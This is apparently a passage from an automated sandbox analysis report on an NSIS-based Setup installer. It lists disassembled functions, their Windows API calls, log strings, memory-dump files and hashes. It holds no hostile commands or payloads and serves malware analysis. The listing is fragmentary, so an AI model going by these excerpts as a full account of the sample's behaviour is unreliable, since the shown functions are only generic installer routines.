                                                                                                                                  • Instruction Fuzzy Hash: BE615D71900219EBCF10DF69ED8469E7FBCAB54356F10413BE810B72A0D7789E90CBA9
                                                                                                                                  Function 00404F9E Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 714 404f9e-404fb1 715 404fb7-404fca 714->715 716 40506e-405070 714->716 717 404fd5-404fe1 lstrlenW 715->717 718 404fcc-404fd0 call 406831 715->718 720 404fe3-404ff3 lstrlenW 717->720 721 404ffe-405002 717->721 718->717 722 404ff5-404ff9 lstrcatW 720->722 723 40506c-40506d 720->723 724 405011-405015 721->724 725 405004-40500b SetWindowTextW 721->725 722->721 723->716 726 405017-405059 SendMessageW * 3 724->726 727 40505b-40505d 724->727 725->724 726->727 727->723 728 40505f-405064 727->728 728->723
                                                                                                                                  APIs
                                                                                                                                  • lstrlenW.KERNEL32(00445D80,00425979,74DF23A0,00000000), ref: 00404FD6
                                                                                                                                  • lstrlenW.KERNEL32(004034E5,00445D80,00425979,74DF23A0,00000000), ref: 00404FE6
                                                                                                                                  • lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00425979,74DF23A0,00000000), ref: 00404FF9
                                                                                                                                  • SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                  • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                  • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                    • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00425979,74DF23A0,00000000), ref: 00406902
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1772012648.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1772000007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772026555.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772158208.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2740478559-0
                                                                                                                                  • Opcode ID: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
                                                                                                                                  • Instruction ID: 2ad3572104664f977ebc3f2c903ed8e4223e657edd1a0c85de02785a0cf57670
                                                                                                                                  • Opcode Fuzzy Hash: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
                                                                                                                                  • Instruction Fuzzy Hash: CD219DB1800518BBDF119F65CD849CFBFB9EF45714F10803AF905B22A1C7794A909B98
                                                                                                                                  Function 00402713 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 729 402713-40273b call 406035 * 2 734 402746-402749 729->734 735 40273d-402743 call 40145c 729->735 737 402755-402758 734->737 738 40274b-402752 call 40145c 734->738 735->734 741 402764-40278c call 40145c call 4062cf WritePrivateProfileStringW 737->741 742 40275a-402761 call 40145c 737->742 738->737 742->741
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                  • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1772012648.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1772000007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772026555.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772158208.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: PrivateProfileStringWritelstrcpyn
                                                                                                                                  • String ID: 183$<RM>$WriteINIStr: wrote [%s] %s=%s in %s
                                                                                                                                  • API String ID: 247603264-2545433164
                                                                                                                                  • Opcode ID: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                                                                                                  • Instruction ID: 073f588d32262f2f2aee4dc53e9f390c64699363c3e1a285ed73a3087a8005e5
                                                                                                                                  • Opcode Fuzzy Hash: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                                                                                                  • Instruction Fuzzy Hash: FF014471D4022AABCB117FA68DC99EE7978AF08345B10403FF115761E3D7B80940CBAD
                                                                                                                                  Function 004021B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 750 4021b5-40220b call 40145c * 4 call 404f9e ShellExecuteW 761 402223-4030f2 call 4062cf 750->761 762 40220d-40221b call 4062cf 750->762 762->761
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00425979,74DF23A0,00000000), ref: 00404FD6
                                                                                                                                    • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00425979,74DF23A0,00000000), ref: 00404FE6
                                                                                                                                    • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00425979,74DF23A0,00000000), ref: 00404FF9
                                                                                                                                    • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                    • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                    • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                    • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                  • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004D70B0,?), ref: 00402202
                                                                                                                                    • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                    • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                  Strings
                                                                                                                                  • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                                                                                                  • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1772012648.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1772000007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772026555.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772158208.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                                                                                                  • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                                                                                                  • API String ID: 3156913733-2180253247
                                                                                                                                  • Opcode ID: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                                                                                                                  • Instruction ID: 745ed8f2a75272e62c3db2eabdadd847eb541a5ed47e1f4d533bb28834579f01
                                                                                                                                  • Opcode Fuzzy Hash: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                                                                                                                  • Instruction Fuzzy Hash: CD01F7B2B4021076D72076B69C87FAB2A5CDB81768B20447BF502F60D3E57D8C40D138
                                                                                                                                  Function 00405EAB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 770 405eab-405eb7 771 405eb8-405eec GetTickCount GetTempFileNameW 770->771 772 405efb-405efd 771->772 773 405eee-405ef0 771->773 775 405ef5-405ef8 772->775 773->771 774 405ef2 773->774 774->775
                                                                                                                                  APIs
                                                                                                                                  • GetTickCount.KERNEL32 ref: 00405EC9
                                                                                                                                  • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040382A,004DF0C0,004E30C8), ref: 00405EE4
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1772012648.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1772000007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772026555.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772158208.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CountFileNameTempTick
                                                                                                                                  • String ID: nsa
                                                                                                                                  • API String ID: 1716503409-2209301699
                                                                                                                                  • Opcode ID: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                                                                                                  • Instruction ID: e8a8b8b1c64af8904643f6899c21fc71a506a3659d4cdc328e790c9301f5e3ed
                                                                                                                                  • Opcode Fuzzy Hash: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                                                                                                  • Instruction Fuzzy Hash: D8F09076600208BBDB10CF69DD05A9FBBBDEF95710F00803BE944E7250E6B09E50DB98
                                                                                                                                  Function 00402175 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 776 402175-40218b call 401446 * 2 781 402198-40219d 776->781 782 40218d-402197 call 4062cf 776->782 783 4021aa-4021b0 EnableWindow 781->783 784 40219f-4021a5 ShowWindow 781->784 782->781 786 4030e3-4030f2 783->786 784->786
                                                                                                                                  APIs
                                                                                                                                  • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                                                                                                    • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                    • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                  • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1772012648.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1772000007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772026555.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772158208.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$EnableShowlstrlenwvsprintf
                                                                                                                                  • String ID: HideWindow
                                                                                                                                  • API String ID: 1249568736-780306582
                                                                                                                                  • Opcode ID: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                                                                                                                  • Instruction ID: f8c041d4f94449417b74c9df8c85987c6128e61f091d6cc810bdb42da7a8293a
                                                                                                                                  • Opcode Fuzzy Hash: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                                                                                                                  • Instruction Fuzzy Hash: 13E0D832A04110DBDB08FFF5A64959E76B4EE9532A72104BFE103F61D2DA7D4D01C62D
                                                                                                                                  Function 0040139D Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                                                                                                  • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1772012648.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1772000007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772026555.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772158208.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3850602802-0
                                                                                                                                  • Opcode ID: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                                                                                                  • Instruction ID: 11189a7010c7ef4f551f6273c6f502c25af520ce36bbf29b1e3929f99495605f
                                                                                                                                  • Opcode Fuzzy Hash: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                                                                                                  • Instruction Fuzzy Hash: 64F02831A10220DBD7165B349C08B273799BB81354F258637F819F62F2D2B8CC41CB4C
                                                                                                                                  Function 00405E7C Relevance: 3.0, APIs: 2, Instructions: 15fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                  • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1772012648.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1772000007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772026555.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772158208.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$AttributesCreate
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 415043291-0
                                                                                                                                  • Opcode ID: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                                                                                                  • Instruction ID: 4537c79132fc6b4e07af9f6f4ddc5e1db4475248beafdc935845b7fb5ee8fdc2
                                                                                                                                  • Opcode Fuzzy Hash: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                                                                                                  • Instruction Fuzzy Hash: 08D09E71558202EFEF098F60DD1AF6EBBA2EB94B00F11852CB252550F1D6B25819DB15
                                                                                                                                  Function 00405E5C Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetFileAttributesW.KERNELBASE(?,00406EAD,?,?,?), ref: 00405E60
                                                                                                                                  • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E73
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1772012648.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1772000007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772026555.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772158208.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AttributesFile
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3188754299-0
                                                                                                                                  • Opcode ID: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                                                                                                  • Instruction ID: cfdb79520ecdf627421b2718222ef799ef1344ba1afc56e39be72dea6d7b0432
                                                                                                                                  • Opcode Fuzzy Hash: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                                                                                                  • Instruction Fuzzy Hash: 25C04C71404905BBDA015B34DE09D1BBB66EFA1331B648735F4BAE01F1C7358C65DA19
                                                                                                                                  Function 00403336 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033D2,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1772012648.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1772000007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772026555.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772158208.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileRead
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2738559852-0
                                                                                                                                  • Opcode ID: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                                                                                                  • Instruction ID: 6ac59f4cb3fe35c1316d0bdd9a7bfda3bd496f009ebd6252a63c396af269f63e
                                                                                                                                  • Opcode Fuzzy Hash: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                                                                                                  • Instruction Fuzzy Hash: 17E08C32650118FFDB109EA69C84EE73B5CFB047A2F00C432BD55E5190DA30DA00EBA4
                                                                                                                                  Function 004037F8 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                    • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                    • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                    • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                  • CreateDirectoryW.KERNELBASE(004E30C8,00000000,004E30C8,004E30C8,004E30C8,-00000002,00403A37), ref: 00403819
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1772012648.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1772000007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772026555.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772158208.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Char$Next$CreateDirectoryPrev
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4115351271-0
                                                                                                                                  • Opcode ID: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                                                                                                  • Instruction ID: c72586207ca4fe3275e323c6ce7a55902ce0015f7edb1a19efdc0f2786dab76c
                                                                                                                                  • Opcode Fuzzy Hash: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                                                                                                  • Instruction Fuzzy Hash: 52D0921218293121C66237663D0ABCF195C4F92B2EB0280B7F942B61D69B6C4A9285EE
                                                                                                                                  Function 00403DDB Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1772012648.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1772000007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772026555.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
